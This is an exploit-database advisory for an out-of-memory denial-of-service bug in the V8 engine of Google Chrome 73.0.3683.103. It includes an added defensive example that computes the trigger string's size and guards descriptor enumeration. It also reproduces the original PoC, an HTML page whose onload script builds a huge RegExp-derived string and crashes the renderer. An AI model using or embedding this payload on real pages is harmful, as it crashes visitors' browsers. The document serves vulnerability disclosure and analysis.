Vendor: Google Chrome
Author: Bogdan Kurinnoy
CVSS: 7.5 (HIGH)
Title: Out-of-memory in invalid table size
CWE: 119
Product Name: Google Chrome
Affected Version From: Google Chrome 73.0.3683.103
Affected Version To: Google Chrome 73.0.3683.103
Patch Exists: YES
Related CWE: N/A
CPE: a:google:chrome
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows x64
Date: 2019

Google Chrome 73.0.3683.103 V8 JavaScript Engine – Out-of-memory in invalid table size. Denial of Service (PoC)

Fatal JavaScript OOM in invalid table size. The PoC combines the Array constructor, Array.prototype.reduce() and Object.getOwnPropertyDescriptors(). Array(60000).join("CCC") builds a string of roughly 180,000 characters; reduce() on a two-element array runs a callback once that stores that string as a RegExp; Array(99).join() then repeats the RegExp's string form 98 times. Calling Object.getOwnPropertyDescriptors() on the resulting multi-megabyte string makes V8 allocate a property table with one entry per character, which ends in a fatal OOM ("invalid table size") and crashes the renderer, i.e. a denial of service.
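To make the trigger concrete, the following is an added JavaScript example, not code from the Exploit-DB entry or from the Chromium bug report. It computes how large the string handed to Object.getOwnPropertyDescriptors() becomes, shows that a string of length n yields n + 1 own property descriptors (one per UTF-16 code unit plus "length"), and wraps the call in a size guard a defender could use. The function names are hypothetical; the constants (60000, 99, "CCC") are the PoC's own.

```javascript
// Added example, not part of the Exploit-DB entry. It quantifies the
// PoC's trigger: Object.getOwnPropertyDescriptors() on a string primitive
// boxes it to a String object that exposes one indexed own property per
// UTF-16 code unit plus "length", so the descriptor table grows linearly
// with string length. All function names here are hypothetical.

// Number of descriptors a string yields, without building the table.
function expectedDescriptorCount(str) {
  return str.length + 1; // one per code unit, plus "length"
}

// Builds the table for a small input to confirm the relation above.
function actualDescriptorCount(str) {
  return Object.keys(Object.getOwnPropertyDescriptors(str)).length;
}

// Array(n).join(piece) yields n - 1 copies of piece (empty slots add nothing).
function joinedLength(n, piece) {
  return Array(n).join(piece).length;
}

// Length of the string the PoC hands to getOwnPropertyDescriptors, computed
// arithmetically rather than materialised. join() stringifies the RegExp as
// "/source/" (no flags), which adds two characters to its source.
function pocStringLength(outer = 99, inner = 60000, piece = "CCC") {
  const regexSource = (inner - 1) * piece.length; // Array(inner).join(piece)
  const regexText = regexSource + 2;              // String(RegExp(source))
  return (outer - 1) * regexText;                 // Array(outer).join(regex)
}

// Cross-check the arithmetic against a small, actually materialised instance.
function checkScaledDown(outer, inner, piece) {
  const regex = RegExp(Array(inner).join(piece));
  const actual = Array(outer).join(regex).length;
  return actual === pocStringLength(outer, inner, piece);
}

// Defensive wrapper: refuse to enumerate descriptors of a string whose
// table would exceed a budget, instead of letting the engine run out of
// memory. Non-string values are passed through unchanged.
function safeDescriptors(value, maxEntries = 10000) {
  if (typeof value === "string" && expectedDescriptorCount(value) > maxEntries) {
    throw new RangeError(
      "refusing to enumerate " + value.length + " indexed properties"
    );
  }
  return Object.getOwnPropertyDescriptors(value);
}
```

Run it with node; the full-size string (about 17.6 million characters) is never built, only its length is derived, and checkScaledDown() verifies the formula on a small instance that materialises safely.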

Mitigation:

Upgrade to the latest version of Google Chrome.

Exploit-DB raw data:

<!--
# Exploit Title: Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-memory in invalid table size . Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-04-20
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 73.0.3683.103
# Tested on: Windows x64
# CVE : N/A

# Description:

# Fatal javascript OOM in invalid table size 

# https://bugs.chromium.org/p/chromium/issues/detail?id=918301
-->


<html>
<head>
<script>

// Two-element array: reduce() without an initial value calls the callback once.
var arr1 = [0,1];

function ObjCreate(make) {
  this.make = make;
}

var obj1 = new ObjCreate();

function main() {

  // Runs f3 once, which stores a very large RegExp in obj1.make.
  arr1.reduce(f3);

  // join() stringifies the RegExp 98 times; enumerating the own property
  // descriptors of the resulting string (one per character) is what
  // triggers the fatal OOM.
  Object.getOwnPropertyDescriptors(Array(99).join(obj1.make));

}

function f3() {

  // Array(60000).join("CCC") yields 59999 copies of "CCC".
  obj1["make"] = RegExp(Array(60000).join("CCC"));
}

</script>
</head>
<body onload="main()"></body>
</html>